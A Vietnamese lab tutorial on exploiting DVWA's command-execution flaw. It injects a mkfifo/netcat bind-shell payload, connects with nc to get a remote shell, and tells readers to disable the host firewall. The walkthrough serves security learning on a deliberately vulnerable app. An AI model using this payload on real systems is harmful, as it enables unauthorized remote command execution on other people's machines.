DVWA - Chương 04: NetCat

Xin chào các bạn, trong bài viết hôm nay mình sẽ giới thiệu với các bạn về công cụ NetCat và kết nối với máy tính chứa ứng dụng DVWA trong Linux. Ngoài ra, chúng ta có thể lợi dụng NetCat để tiến hành sử dụng các câu lệnh trong Linux để thực thi thông qua NetCat.





Yêu cầu
Để chuẩn bị cho chương này, các bạn cần có những phần mềm sau:
  • Máy tính chạy hệ điều hành Linux (khuyến khích sử dụng hệ điều hành Fedora). Ngoài ra, mình muốn các bạn tắt tường lửa trên hệ điều hành phòng trừ trường hợp không gửi được gói tin. Máy Fedora có địa chỉ IP: 192.168.112.138
  • Phần mềm XAMPP tải ở đường link này: https://www.apachefriends.org/index.html
  • Tải và cài đặt ứng dụng web DVWA tại đường link này: http://www.dvwa.co.uk/
  • Trình duyệt web FireFox.
  • Một máy dùng để tấn công (sử dụng Kali, Parrot, Arch,...) có IP: 192.168.112.175


Màn hình hệ điều hành Parrot


Màn hình hệ điều hành Fedora


Thực hành
Đầu tiên, chúng ta sẽ mở trình duyệt và gõ vào địa chỉ IP của máy Fedora theo liên kết như sau: "192.168.112.138/dvwa/" để vào trang đăng nhập của DVWA. Các bạn cần lưu ý kiểm tra xem Fedora đã tắt "firewall" chưa, nếu chưa thì các bạn nên tắt qua câu lệnh "systemctl stop firewalld.service" để có thể kết nối được.


Trang đăng nhập DVWA


Tiếp theo chúng ta đăng nhập theo tài khoản có Username là "admin" và Password là "password". Sau khi đăng nhập thành công, chọn tab có dòng chữ là "DVWA Security" và thiết lập xuống mức "Low".


Tab "DVWA Security"


Sau đó các bạn chọn tab "Command Execution" để thực thi câu lệnh sử dụng "Name Pipe" với công cụ NetCat. Các bạn sẽ gõ câu lệnh: "192.168.112.138 ; mkfifo /tmp/pipe ; sh /tmp/pipe | nc -l 1234 > /tmp/pipe". Câu lệnh này có thể giải thích như sau:
  • mkfifo /tmp/pipe: câu lệnh này sẽ tạo ra một đường ống FIFO (First In - First Out) và đặt tên là "pipe".
  • sh /tmp/pipe: câu lệnh này sẽ cho phép thực thi các "shell" thông qua đường ống "pipe".
  • nc -l 1234 > /tmp/pipe: câu lệnh này yêu cầu công cụ NetCat lắng nghe "port" 1234 và cho phép dữ liệu ra vào thông qua đường ống "pipe".


Tab "Command Execution"


Khi đó, trang web sẽ luôn ở trạng thái "Loading" và chúng ta thông qua NetCat sẽ kết nối với đường ống "pipe" đó theo câu lệnh như sau: "nc 192.168.112.138 1234" để có thể thực hiện các lệnh "shell" tới máy Fedora. Chúng ta có thể thực hiện các câu lệnh cơ bản như sau: "hostname", "uname -a", "whoami" "dir",...


NetCat



Tóm tắt
Chúng ta đã được giới thiệu về cách khai thác lỗi "Command Execution" thông qua công cụ NetCat. Nó cho phép lắng nghe và kết nối với đường ống đã được tạo và tiến hành gửi các shell tới khai thác thông tin máy nạn nhân. Cám ơn các bạn đã xem bài viết này.
Next Post Previous Post
No Comment
Add Comment
comment url